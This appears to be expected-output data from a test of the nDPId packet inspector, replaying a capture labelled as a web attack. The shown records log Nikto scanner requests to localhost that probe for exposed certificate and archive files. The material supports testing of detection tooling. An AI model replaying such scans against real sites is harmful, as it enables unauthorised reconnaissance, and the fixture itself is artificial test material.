00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276874,"pkt":"AAAAAAAAAAAAAAAACABFAADCE1BAAEAGKOR\/AAABfwAAAcKSH5DnJisNBZiCk4AYAED+tgAAAQEICp1m+7KdZvuyR0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276876,"pkt":"AAAAAAAAAAAAAAAACABFAADCnWxAAEAGnsd\/AAABfwAAAcKUH5Co\/aUqs\/1iGoAYAED+tgAAAQEICp1m+7SdZvu0R0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276876,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276877,"pkt":"AAAAAAAAAAAAAAAACABFAADAt7lAAEAGhHx\/AAABfwAAAcKWH5CQPI\/1lm3rwoAYAED+tAAAAQEICp1m+7WdZvu1R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276879,"pkt":"AAAAAAAAAAAAAAAACABFAADAhf9AAEAGtjZ\/AAABfwAAAcKYH5Cnmb2\/tsRlFIAYAED+tAAAAQEICp1m+7edZvu2R0VUIC9zaXRlLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276879,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276881,"pkt":"AAAAAAAAAAAAAAAACABFAADADYtAAEAGLqt\/AAABfwAAAcKaH5CHzTXOE9kNb4AYAED+tAAAAQEICp1m+7mdZvu5R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276881,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276884,"pkt":"AAAAAAAAAAAAAAAACABFAADAT5pAAEAG7Jt\/AAABfwAAAcKcH5DBOXfeD5T\/lYAYAED+tAAAAQEICp1m+7udZvu7R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276885,"pkt":"AAAAAAAAAAAAAAAACABFAADFQQ5AAEAG+yJ\/AAABfwAAAcKeH5AdhXlKg0oevYAYAED+uQAAAQEICp1m+72dZvu9R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276886,"pkt":"AAAAAAAAAAAAAAAACABFAADFWJBAAEAG46B\/AAABfwAAAcKgH5CSJ2DMWYYFgIAYAED+uQAAAQEICp1m+76dZvu+R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276888,"pkt":"AAAAAAAAAAAAAAAACABFAAC95a1AAEAGVot\/AAABfwAAAcKiH5DfWN3u+DsBkYAYAED+sQAAAQEICp1m+8CdZvvAR0VUIC8wLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276890,"pkt":"AAAAAAAAAAAAAAAACABFAAC9vy5AAEAGfQp\/AAABfwAAAcKkH5Dme4drk\/tL44AYAED+sQAAAQEICp1m+8KdZvvCR0VUIC8wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276891,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/ZdAAEAGPpl\/AAABfwAAAcKmH5DYD8XTrc+7CoAYAED+uQAAAQEICp1m+8OdZvvDR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
